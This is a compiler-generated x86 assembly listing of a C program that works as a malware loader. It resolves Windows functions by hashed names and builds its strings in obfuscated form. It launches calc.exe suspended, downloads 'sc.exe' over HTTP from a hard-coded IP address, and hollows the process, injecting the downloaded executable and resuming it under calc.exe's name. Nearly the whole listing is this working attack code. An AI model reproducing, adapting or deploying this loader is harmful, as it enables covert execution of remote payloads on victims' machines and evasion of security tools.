; Listing generated by Microsoft (R) Optimizing Compiler Version 18.00.21005.1 

	TITLE	C:\Users\sickness\Documents\Visual Studio 2013\Projects\sc\sc\sc.c
	.686P
	.XMM
	include listing.inc
	.model	flat

INCLUDELIB OLDNAMES

PUBLIC	_ExecPayload
PUBLIC	_GetProcAddressByHash
PUBLIC	_RtlSecureZeroMemory
; Function compile flags: /Ogspy
;	COMDAT _RtlSecureZeroMemory
_TEXT	SEGMENT
_RtlSecureZeroMemory PROC				; COMDAT
; _ptr$ = ecx
; _cnt$ = edx
; File c:\program files (x86)\windows kits\8.1\include\um\winnt.h
; Line 17764
	mov	eax, ecx
$LL2@RtlSecureZ:
; Line 17780
	mov	BYTE PTR [eax], 0
; Line 17784
	inc	eax
; Line 17785
	dec	edx
	jne	SHORT $LL2@RtlSecureZ
; Line 17790
	mov	eax, ecx
; Line 17791
	ret	0
_RtlSecureZeroMemory ENDP
_TEXT	ENDS
; Function compile flags: /Ogspy
;	COMDAT _GetProcAddressByHash
_TEXT	SEGMENT
_dwExportDirRVA$1$ = -16				; size = 4
_dwNumFunctions$1$ = -12				; size = 4
_BaseDllName$1$ = -12					; size = 4
_dwModuleFunctionHash$1$ = -8				; size = 4
_pdwFunctionNameBase$1$ = -4				; size = 4
_GetProcAddressByHash PROC				; COMDAT
; _dwModuleFunctionHash$ = ecx
; File c:\users\sickness\documents\visual studio 2013\projects\sc\sc\getprocaddressbyhash.h
; Line 32
	sub	esp, 16					; 00000010H
; Line 59
	mov	eax, DWORD PTR fs:48
	push	ebx
	push	ebp
	push	esi
; Line 64
	mov	eax, DWORD PTR [eax+12]
	push	edi
	mov	DWORD PTR _dwModuleFunctionHash$1$[esp+32], ecx
	mov	esi, DWORD PTR [eax+12]
; Line 66
	jmp	$LN5@GetProcAdd
$LL15@GetProcAdd:
; Line 70
	mov	eax, DWORD PTR [esi+48]
	xor	ecx, ecx
	mov	ebx, DWORD PTR [esi+44]
; Line 75
	mov	esi, DWORD PTR [esi]
	mov	DWORD PTR _BaseDllName$1$[esp+32], eax
	mov	eax, DWORD PTR [edx+60]
	mov	ebp, DWORD PTR [eax+edx+120]
	mov	DWORD PTR _dwExportDirRVA$1$[esp+32], ebp
; Line 78
	test	ebp, ebp
	je	SHORT $LN5@GetProcAdd
; Line 84
	shr	ebx, 16					; 00000010H
	xor	edi, edi
	test	ebx, ebx
	je	SHORT $LN10@GetProcAdd
	mov	ebp, DWORD PTR _BaseDllName$1$[esp+32]
$LL12@GetProcAdd:
; Line 90
	mov	al, BYTE PTR [edi+ebp]
	ror	ecx, 13					; 0000000dH
	cmp	al, 97					; 00000061H
; Line 92
	movsx	eax, al
	jl	SHORT $LN9@GetProcAdd
	add	ecx, -32				; ffffffe0H
$LN9@GetProcAdd:
; Line 96
	add	ecx, eax
	inc	edi
	cmp	edi, ebx
	jb	SHORT $LL12@GetProcAdd
	mov	ebp, DWORD PTR _dwExportDirRVA$1$[esp+32]
$LN10@GetProcAdd:
; Line 103
	mov	eax, DWORD PTR [edx+ebp+32]
; Line 105
	xor	ebx, ebx
	mov	edi, DWORD PTR [edx+ebp+24]
	add	eax, edx
	mov	DWORD PTR _dwNumFunctions$1$[esp+32], edi
	test	edi, edi
	je	SHORT $LN5@GetProcAdd
$LL7@GetProcAdd:
; Line 108
	mov	ebp, DWORD PTR [eax]
	xor	edi, edi
	add	ebp, edx
; Line 109
	add	eax, 4
	mov	DWORD PTR _pdwFunctionNameBase$1$[esp+32], eax
$LL4@GetProcAdd:
; Line 116
	movsx	eax, BYTE PTR [ebp]
	ror	edi, 13					; 0000000dH
	add	edi, eax
; Line 117
	inc	ebp
; Line 118
	cmp	BYTE PTR [ebp-1], 0
	jne	SHORT $LL4@GetProcAdd
; Line 120
	lea	eax, DWORD PTR [edi+ecx]
; Line 122
	cmp	eax, DWORD PTR _dwModuleFunctionHash$1$[esp+32]
	je	SHORT $LN23@GetProcAdd
; Line 105
	mov	eax, DWORD PTR _pdwFunctionNameBase$1$[esp+32]
	inc	ebx
	cmp	ebx, DWORD PTR _dwNumFunctions$1$[esp+32]
	jb	SHORT $LL7@GetProcAdd
$LN5@GetProcAdd:
; Line 66
	mov	edx, DWORD PTR [esi+24]
	test	edx, edx
	jne	$LL15@GetProcAdd
; Line 131
	xor	eax, eax
$LN16@GetProcAdd:
; Line 132
	pop	edi
	pop	esi
	pop	ebp
	pop	ebx
	add	esp, 16					; 00000010H
	ret	0
$LN23@GetProcAdd:
; Line 124
	mov	esi, DWORD PTR _dwExportDirRVA$1$[esp+32]
	mov	eax, DWORD PTR [esi+edx+36]
	lea	eax, DWORD PTR [eax+ebx*2]
; Line 125
	movzx	ecx, WORD PTR [eax+edx]
	mov	eax, DWORD PTR [esi+edx+28]
	lea	eax, DWORD PTR [eax+ecx*4]
	mov	eax, DWORD PTR [eax+edx]
	add	eax, edx
	jmp	SHORT $LN16@GetProcAdd
_GetProcAddressByHash ENDP
_TEXT	ENDS
; Function compile flags: /Ogspy
;	COMDAT _ExecPayload
_TEXT	SEGMENT
_Count$1$ = -292					; size = 4
_MyVirtualAlloc$1$ = -292				; size = 4
_process3$ = -288					; size = 4
_process$ = -284					; size = 15
_payload$ = -268					; size = 7
_http$ = -260						; size = 9
_wininet$ = -248					; size = 12
_hostname$ = -236					; size = 15
_process2$ = -220					; size = 15
_MyInternetReadFile$1$ = -204				; size = 4
_zero_buff$1$ = -204					; size = 4
_MyWriteProcessMemory$1$ = -200				; size = 4
_pi$ = -196						; size = 16
_MySetThreadContext$1$ = -180				; size = 4
_MyWaitForSingleObject$1$ = -176			; size = 4
_dwImageBase$ = -172					; size = 4
_MyVirtualProtectEx$1$ = -168				; size = 4
_pebInfo$1$ = -164					; size = 4
_MyInternetOpenA$1$ = -160				; size = 4
_MyVirtualQueryEx$1$ = -156				; size = 4
_MyInternetConnectA$1$ = -152				; size = 4
_MyVirtualFree$1$ = -148				; size = 4
_MyHttpOpenRequestA$1$ = -144				; size = 4
_CTX$1$ = -140						; size = 4
_dwFlags$ = -136					; size = 4
_MyVirtualAllocEx$1$ = -132				; size = 4
_MyInternetSetOptionA$1$ = -128				; size = 4
_MyResumeThread$1$ = -124				; size = 4
_MyHttpSendRequestA$1$ = -120				; size = 4
_oldProtect$ = -116					; size = 4
_bytesRead$ = -112					; size = 4
_read$ = -108						; size = 4
_wrote_zero$ = -104					; size = 4
_memInfo$ = -100					; size = 28
_si$ = -72						; size = 68
_ExecPayload PROC					; COMDAT
; File c:\users\sickness\documents\visual studio 2013\projects\sc\sc\sc.c
; Line 171
	push	ebp
	mov	ebp, esp
	and	esp, -8					; fffffff8H
	sub	esp, 296				; 00000128H
; Line 177
	lea	eax, DWORD PTR _si$[esp+296]
	xor	edx, edx
	push	ebx
	push	ebp
	push	esi
	push	edi
	push	68					; 00000044H
	pop	esi
	mov	ecx, esi
$LL12@ExecPayloa:
	mov	BYTE PTR [eax], dl
	inc	eax
	dec	ecx
	jne	SHORT $LL12@ExecPayloa
; Line 179
	push	16					; 00000010H
	mov	DWORD PTR _si$[esp+316], esi
	lea	eax, DWORD PTR _pi$[esp+316]
	pop	ecx
$LL16@ExecPayloa:
	mov	BYTE PTR [eax], dl
	inc	eax
	dec	ecx
	jne	SHORT $LL16@ExecPayloa
; Line 218
	lea	eax, DWORD PTR _wininet$[esp+312]
	mov	DWORD PTR _wininet$[esp+312], 1768843639 ; 696e6977H
	push	eax
	mov	ecx, 119961420				; 0726774cH
	mov	DWORD PTR _wininet$[esp+320], 779380078	; 2e74656eH
	mov	DWORD PTR _wininet$[esp+324], 7105636	; 006c6c64H
	mov	DWORD PTR _process$[esp+316], 1549548099 ; 5c5c3a43H
	mov	DWORD PTR _process$[esp+320], 1684957527 ; 646e6957H
	mov	DWORD PTR _process$[esp+324], 1551071087 ; 5c73776fH
	mov	WORD PTR _process$[esp+328], 21340	; 0000535cH
	mov	BYTE PTR _process$[esp+330], dl
	mov	DWORD PTR _process2$[esp+316], 1702130553 ; 65747379H
	mov	DWORD PTR _process2$[esp+320], 1546793837 ; 5c32336dH
	mov	DWORD PTR _process2$[esp+324], 1818321756 ; 6c61635cH
	mov	WORD PTR _process2$[esp+328], 11875	; 00002e63H
	mov	BYTE PTR _process2$[esp+330], dl
	mov	DWORD PTR _process3$[esp+316], 6649957	; 00657865H
	call	_GetProcAddressByHash
	call	eax
; Line 221
	mov	ecx, -2042639239			; 863fcc79H
	call	_GetProcAddressByHash
; Line 222
	mov	ecx, 1612547848				; 601d8708H
	mov	edi, eax
	call	_GetProcAddressByHash
; Line 223
	mov	ecx, -784180200				; d1425c18H
	mov	DWORD PTR _MyWaitForSingleObject$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 224
	mov	ecx, 1912198082				; 71f9d3c2H
	mov	ebx, eax
	call	_GetProcAddressByHash
; Line 225
	mov	ecx, -340346453				; ebb6b9abH
	mov	ebp, eax
	call	_GetProcAddressByHash
; Line 226
	mov	ecx, -1485220294			; a779563aH
	mov	DWORD PTR _MyVirtualQueryEx$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 227
	mov	ecx, -962623145				; c69f8957H
	mov	DWORD PTR _MyInternetOpenA$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 228
	mov	ecx, 992892395				; 3b2e55ebH
	mov	DWORD PTR _MyInternetConnectA$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 229
	mov	ecx, -2036447627			; 869e4675H
	mov	DWORD PTR _MyHttpOpenRequestA$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 230
	mov	ecx, 2065172013				; 7b18062dH
	mov	DWORD PTR _MyInternetSetOptionA$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 231
	mov	ecx, -494299630				; e2899612H
	mov	DWORD PTR _MyHttpSendRequestA$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 232
	mov	ecx, -447503272				; e553a458H
	mov	DWORD PTR _MyInternetReadFile$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 233
	mov	ecx, -406988603				; e7bdd8c5H
	mov	DWORD PTR _MyVirtualAlloc$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 234
	mov	ecx, -849234522				; cd61b5a6H
	mov	DWORD PTR _MyWriteProcessMemory$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 235
	mov	ecx, 1066567598				; 3f9287aeH
	mov	DWORD PTR _MyVirtualProtectEx$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 236
	mov	ecx, -783393768				; d14e5c18H
	mov	DWORD PTR _MyVirtualAllocEx$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 237
	mov	ecx, -1896609493			; 8ef4092bH
	mov	DWORD PTR _MySetThreadContext$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 238
	mov	ecx, 806301451				; 300f2f0bH
	mov	DWORD PTR _MyResumeThread$1$[esp+312], eax
	call	_GetProcAddressByHash
; Line 239
	mov	ecx, 1579310292				; 5e225cd4H
	mov	DWORD PTR _MyVirtualFree$1$[esp+312], eax
	call	_GetProcAddressByHash
	mov	esi, eax
; Line 245
	lea	eax, DWORD PTR _process2$[esp+312]
	push	eax
	lea	eax, DWORD PTR _process$[esp+316]
	push	eax
	call	esi
; Line 246
	lea	eax, DWORD PTR _process3$[esp+312]
	push	eax
	lea	eax, DWORD PTR _process$[esp+316]
	push	eax
	call	esi
; Line 247
	lea	eax, DWORD PTR _pi$[esp+312]
	xor	esi, esi
	push	eax
	lea	eax, DWORD PTR _si$[esp+316]
	push	eax
	push	esi
	push	esi
	push	134217732				; 08000004H
	push	1
	push	esi
	push	esi
	lea	eax, DWORD PTR _process$[esp+344]
	push	eax
	push	esi
	call	edi
; Line 251
	mov	edi, DWORD PTR _MyVirtualAlloc$1$[esp+312]
	push	4
	push	4096					; 00001000H
	push	4
	push	esi
	call	edi
	mov	esi, eax
; Line 253
	push	esi
	mov	DWORD PTR _CTX$1$[esp+316], esi
	mov	DWORD PTR [esi], 65543			; 00010007H
	push	DWORD PTR _pi$[esp+320]
	call	ebx
; Line 256
	mov	eax, DWORD PTR [esi+164]
; Line 261
	lea	ecx, DWORD PTR _read$[esp+312]
	push	ecx
	push	4
	lea	ecx, DWORD PTR _dwImageBase$[esp+320]
	add	eax, 8
	push	ecx
	push	eax
	push	DWORD PTR _pi$[esp+328]
	mov	DWORD PTR _pebInfo$1$[esp+332], eax
	call	ebp
; Line 264
	mov	ebp, DWORD PTR _dwImageBase$[esp+312]
; Line 269
	lea	eax, DWORD PTR _memInfo$[esp+312]
	mov	esi, DWORD PTR _MyVirtualQueryEx$1$[esp+312]
	mov	ebx, ebp
	push	28					; 0000001cH
	push	eax
	push	ebp
	jmp	SHORT $LN38@ExecPayloa
$LL8@ExecPayloa:
; Line 270
	cmp	DWORD PTR _memInfo$[esp+328], 65536	; 00010000H
	je	SHORT $LN23@ExecPayloa
; Line 273
	add	ebx, DWORD PTR _memInfo$[esp+324]
	lea	eax, DWORD PTR _memInfo$[esp+312]
	push	28					; 0000001cH
	push	eax
	push	ebx
$LN38@ExecPayloa:
; Line 269
	push	DWORD PTR _pi$[esp+324]
	call	esi
	test	eax, eax
	jne	SHORT $LL8@ExecPayloa
$LN23@ExecPayloa:
; Line 303
	xor	eax, eax
	mov	DWORD PTR _dwFlags$[esp+312], 13184	; 00003380H
; Line 308
	push	eax
	push	eax
	push	eax
	push	eax
	push	eax
	sub	ebx, ebp
	mov	DWORD PTR _hostname$[esp+332], 775043377 ; 2e323931H
	mov	DWORD PTR _hostname$[esp+336], 775435825 ; 2e383631H
	mov	DWORD PTR _hostname$[esp+340], 825111348 ; 312e3334H
	mov	WORD PTR _hostname$[esp+344], 12339	; 00003033H
	mov	BYTE PTR _hostname$[esp+346], al
	mov	DWORD PTR _payload$[esp+332], 1697538931 ; 652e6373H
	mov	WORD PTR _payload$[esp+336], 25976	; 00006578H
	mov	BYTE PTR _payload$[esp+338], al
	mov	DWORD PTR _http$[esp+332], 1347703880	; 50545448H
	mov	DWORD PTR _http$[esp+336], 825110831	; 312e312fH
	mov	BYTE PTR _http$[esp+340], al
	call	DWORD PTR _MyInternetOpenA$1$[esp+332]
; Line 309
	xor	esi, esi
	lea	ecx, DWORD PTR _hostname$[esp+312]
	push	esi
	push	-2147483648				; 80000000H
	push	3
	push	esi
	push	esi
	push	80					; 00000050H
	push	ecx
	push	eax
	call	DWORD PTR _MyInternetConnectA$1$[esp+344]
; Line 310
	push	esi
	push	-1610612736				; a0000000H
	push	esi
	push	esi
	lea	ecx, DWORD PTR _http$[esp+328]
	push	ecx
	lea	ecx, DWORD PTR _payload$[esp+332]
	push	ecx
	push	esi
	push	eax
	call	DWORD PTR _MyHttpOpenRequestA$1$[esp+344]
	mov	esi, eax
; Line 311
	lea	eax, DWORD PTR _dwFlags$[esp+312]
	push	4
	push	eax
	push	31					; 0000001fH
	push	esi
	call	DWORD PTR _MyInternetSetOptionA$1$[esp+328]
; Line 312
	xor	eax, eax
	push	eax
	push	eax
	push	eax
	push	eax
	push	esi
	call	DWORD PTR _MyHttpSendRequestA$1$[esp+332]
; Line 315
	push	64					; 00000040H
	push	4096					; 00001000H
	push	20971520				; 01400000H
	push	0
	call	edi
	mov	edi, eax
; Line 316
	lea	eax, DWORD PTR _bytesRead$[esp+312]
	push	eax
	push	20971520				; 01400000H
	push	edi
	push	esi
	call	DWORD PTR _MyInternetReadFile$1$[esp+328]
; Line 318
	push	4
	push	4096					; 00001000H
	push	ebx
	push	0
	call	DWORD PTR _MyVirtualAlloc$1$[esp+328]
	mov	DWORD PTR _zero_buff$1$[esp+312], eax
; Line 322
	mov	eax, 23117				; 00005a4dH
	cmp	WORD PTR [edi], ax
	jne	$LN5@ExecPayloa
; Line 324
	mov	esi, DWORD PTR [edi+60]
	add	esi, edi
; Line 325
	cmp	DWORD PTR [esi], 17744			; 00004550H
	jne	$LN4@ExecPayloa
; Line 328
	lea	eax, DWORD PTR _oldProtect$[esp+312]
	push	eax
	push	64					; 00000040H
	push	ebx
	push	ebp
	push	DWORD PTR _pi$[esp+328]
	call	DWORD PTR _MyVirtualProtectEx$1$[esp+332]
; Line 329
	lea	eax, DWORD PTR _wrote_zero$[esp+312]
	push	eax
	push	ebx
	push	DWORD PTR _zero_buff$1$[esp+320]
	mov	ebx, DWORD PTR _MyWriteProcessMemory$1$[esp+324]
	push	ebp
	push	DWORD PTR _pi$[esp+328]
	call	ebx
; Line 334
	push	64					; 00000040H
	push	12288					; 00003000H
	push	DWORD PTR [esi+80]
	push	DWORD PTR [esi+52]
	push	DWORD PTR _pi$[esp+328]
	call	DWORD PTR _MyVirtualAllocEx$1$[esp+332]
; Line 337
	push	0
	push	DWORD PTR [esi+84]
	mov	ebp, eax
	push	edi
	push	ebp
	push	DWORD PTR _pi$[esp+328]
	call	ebx
; Line 340
	and	DWORD PTR _Count$1$[esp+312], 0
	xor	eax, eax
	cmp	ax, WORD PTR [esi+6]
	jae	SHORT $LN1@ExecPayloa
; Line 328
	xor	ebx, ebx
$LL3@ExecPayloa:
; Line 341
	mov	ecx, DWORD PTR [edi+60]
	add	ecx, ebx
; Line 342
	push	0
	push	DWORD PTR [ecx+edi+264]
	mov	eax, DWORD PTR [ecx+edi+268]
	add	eax, edi
	push	eax
	mov	eax, DWORD PTR [ecx+edi+260]
	add	eax, ebp
	push	eax
	push	DWORD PTR _pi$[esp+328]
	call	DWORD PTR _MyWriteProcessMemory$1$[esp+332]
	mov	ecx, DWORD PTR _Count$1$[esp+312]
	add	ebx, 40					; 00000028H
	movzx	eax, WORD PTR [esi+6]
	inc	ecx
	mov	DWORD PTR _Count$1$[esp+312], ecx
	cmp	ecx, eax
	jl	SHORT $LL3@ExecPayloa
	mov	ebx, DWORD PTR _MyWriteProcessMemory$1$[esp+312]
$LN1@ExecPayloa:
; Line 346
	push	0
	push	4
	lea	eax, DWORD PTR [esi+52]
	push	eax
	push	DWORD PTR _pebInfo$1$[esp+324]
	push	DWORD PTR _pi$[esp+328]
	call	ebx
; Line 347
	mov	ecx, DWORD PTR _CTX$1$[esp+312]
	mov	eax, DWORD PTR [esi+40]
	add	eax, ebp
; Line 348
	push	ecx
	mov	DWORD PTR [ecx+176], eax
	push	DWORD PTR _pi$[esp+320]
	call	DWORD PTR _MySetThreadContext$1$[esp+320]
; Line 349
	push	DWORD PTR _pi$[esp+316]
	call	DWORD PTR _MyResumeThread$1$[esp+316]
$LN4@ExecPayloa:
; Line 353
	push	32768					; 00008000H
	push	0
	push	edi
	call	DWORD PTR _MyVirtualFree$1$[esp+324]
$LN5@ExecPayloa:
; Line 357
	push	-1
	push	DWORD PTR _pi$[esp+316]
	call	DWORD PTR _MyWaitForSingleObject$1$[esp+320]
; Line 358
	pop	edi
	pop	esi
	pop	ebp
	pop	ebx
	mov	esp, ebp
	pop	ebp
	ret	0
_ExecPayload ENDP
_TEXT	ENDS
END
